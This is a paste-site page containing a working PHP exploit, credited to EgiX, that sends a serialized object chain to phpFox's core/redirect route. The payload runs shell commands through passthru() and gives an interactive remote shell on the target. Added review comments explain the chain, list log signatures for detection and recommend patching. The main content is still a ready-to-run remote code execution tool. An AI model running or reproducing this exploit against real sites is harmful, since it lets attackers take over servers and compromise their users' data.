FlyFar

phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit

Feb 22nd, 2024
<?php

// Proof-of-concept client for a PHP object injection issue reached through
// phpFox's "redirect" route, credited to EgiX in the banner below.
// NOTE(review): the paste title says "< 4.8.13" while the banner printed by
// this script says "<= 4.8.13" — confirm the affected and fixed versions
// against the vendor advisory before using either figure to triage an
// installation.

// No execution time limit; only fatal errors are reported.
set_time_limit(0);
error_reporting(E_ERROR);

// All HTTP traffic in this script goes through the cURL extension.
if (!extension_loaded("curl")) die("[+] cURL extension required!\n");

print "+------------------------------------------------------------------+\n";
print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n";
print "+------------------------------------------------------------------+\n";

// Exactly one command-line argument is expected: the base URL of the site.
if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");

  15. function encode($string)
  16. {
  17.         $string = addslashes(gzcompress($string, 9));
  18.         return urlencode(strtr(base64_encode($string), '+/=', '-_,'));
  19. }
  20.  
// Local stand-in class: it declares two private properties with default
// values and no methods. In this script it exists only so that serialize()
// can emit an object with this class name and these property names.
class Phpfox_Request
{
    // Plain string; same value as the author credit in the banner.
    private $_sName = "EgiX";
    // PHP source held as a string. When evaluated it prints a "_____"
    // delimiter, passes the base64-decoded value of the incoming "CMD"
    // request header ($_SERVER['HTTP_CMD']) to passthru(), prints the
    // delimiter again and ends the request.
    // NOTE(review): presumably the application's own get() method evaluates
    // this property as plugin code; that code is not on this page — confirm
    // against the phpFox source.
    // Detection: requests that carry a "CMD" header and responses wrapped in
    // "_____" markers are artefacts of this script and can be matched in
    // web-server or proxy logs.
    private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;";
}

// Local stand-in for the namespaced class name `Core\Objectify`: it is
// declared here without a namespace, and the script later rewrites the class
// name inside the serialized text. Both spellings are 14 bytes long, so the
// length prefixes in the serialized data remain valid after the rewrite.
// NOTE(review): the property name suggests the real class invokes the stored
// callable when the object is converted to a string — not visible on this
// page; confirm against the phpFox source.
class Core_Objectify
{
    // Holds whatever value the constructor receives.
    private $__toString;
   
    /**
     * @param mixed $callback Stored unchanged; this script passes an
     *                        [object, "get"] pair.
     */
    function __construct($callback)
    {
        $this->__toString = $callback;
    }
}

print "\n[+] Launching shell on {$argv[1]}\n";

// Build the serialized object graph: a Core_Objectify whose stored value is
// [Phpfox_Request instance, "get"], then rename the outer class to its
// namespaced spelling inside the serialized text.
$popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"]));
$popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain);

$ch = curl_init();

// Every request is a POST (CURLOPT_POSTFIELDS is set) to
// <URL>index.php/core/redirect with one form field, `url`, carrying the
// encoded serialized object.
// Defensive takeaway: the weakness class is unserialize() applied to
// request-controlled data. Updating phpFox to a fixed release is the remedy
// for affected sites; in custom code, treat such fields as plain strings or
// JSON, or call unserialize() with ['allowed_classes' => false].
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// TLS peer certificate verification is switched off for these requests.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain));

// Interactive loop: read one line from STDIN, stop on "exit", otherwise send
// it base64-encoded in a "CMD" request header and print whatever the
// response contains between two "_____" markers. If the markers are absent
// the script prints a failure message and terminates.
// Detection: repeated POSTs to /core/redirect with an identical `url` body
// and a changing "CMD" header are the on-the-wire pattern this loop produces.
while(1)
{
    print "\nphpFox-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
    preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");
}